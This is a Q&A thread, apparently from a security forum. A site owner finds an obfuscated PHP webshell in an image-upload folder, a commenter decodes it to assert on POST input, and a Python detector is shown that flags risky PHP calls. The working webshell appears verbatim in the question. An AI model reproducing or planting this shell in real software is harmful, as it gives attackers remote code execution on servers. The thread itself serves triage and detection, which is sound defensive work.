2

Recently I found out my project got hacked, and I found a script in my images folder, which was a directory for users to upload their images (using file input). Here is the script that I found in the directory.

errot_db.php

```php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
```
Way Shen
    Why would you say it's not malicious code? If you remove all the comments, and rebuild the string, you get `assert(${"_POST"}[0-2-5])` - it's a minimal webshell. – Matthew Nov 21 '16 at 16:02
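
As an added example (not part of the original post or comment), the manual step Matthew describes, removing the comments and rebuilding the strings, can be automated when triaging files found in an upload directory. This Python sketch handles only the constructs seen in this sample (comments, double-quoted literal concatenation, simple variable reassignment); the function names and the `RISKY` list are assumptions of the example.

```python
import re

# Sample input: the uploaded file quoted in the question, embedded verbatim.
SAMPLE = r'''<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>'''

# String literals are matched first so comment markers inside them survive.
TOKEN = re.compile(r'''"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|/\*.*?\*/|(?://|\#)[^\n]*''', re.S)
CONCAT = re.compile(r'"([^"\\$]*)"\s*\.\s*"([^"\\$]*)"')
VAR = re.compile(r'\$(\w+)')
ASSIGN = re.compile(r'\s*@?\$(\w+)\s*=(?!=)\s*(.*)', re.S)
# Illustrative (not exhaustive) list of callables that run code or commands.
RISKY = {"assert", "eval", "system", "exec", "passthru", "shell_exec", "create_function"}

def strip_comments(src):
    """Drop PHP comments, keep string literals untouched."""
    return TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] in "\"'" else "", src)

def fold(expr, env):
    """Substitute variables with known string values, then merge "a"."b" until stable."""
    expr = VAR.sub(lambda m: '"%s"' % env[m.group(1)] if m.group(1) in env else m.group(0), expr)
    prev = None
    while prev != expr:
        prev, expr = expr, CONCAT.sub(r'"\1\2"', expr)
    return expr

def analyse(src):
    """Return [(callee, argument)] for variable-function calls that resolve to a risky name."""
    env, findings = {}, []
    code = re.sub(r'<\?(?:php)?|\?>', ' ', strip_comments(src))
    for stmt in code.split(";"):
        m = ASSIGN.fullmatch(stmt)
        if m:  # track $var = "constant string" so later uses can be resolved
            value = fold(m.group(2), env).strip()
            if re.fullmatch(r'"[^"\\$]*"', value):
                env[m.group(1)] = value[1:-1]
            continue
        call = re.search(r'\$(\w+)\s*\((.*)\)', stmt, re.S)
        if call and env.get(call.group(1)) in RISKY:
            # ${"_POST"} is the same variable as $_POST
            arg = re.sub(r'\$\{\s*"(\w+)"\s*\}', r'$\1', fold(call.group(2), env))
            findings.append((env[call.group(1)], "".join(arg.split())))
    return findings

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

A non-empty result for any file in a user-upload directory is a strong signal to quarantine it; it is a regex heuristic, not a PHP parser, so an empty result does not clear a file.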

1 Answer

1

I just Google-dorked the code here and it looks to be some sort of malware/trojan aimed at IP address filtering on a webshell. You may need to translate the page to English.

katrix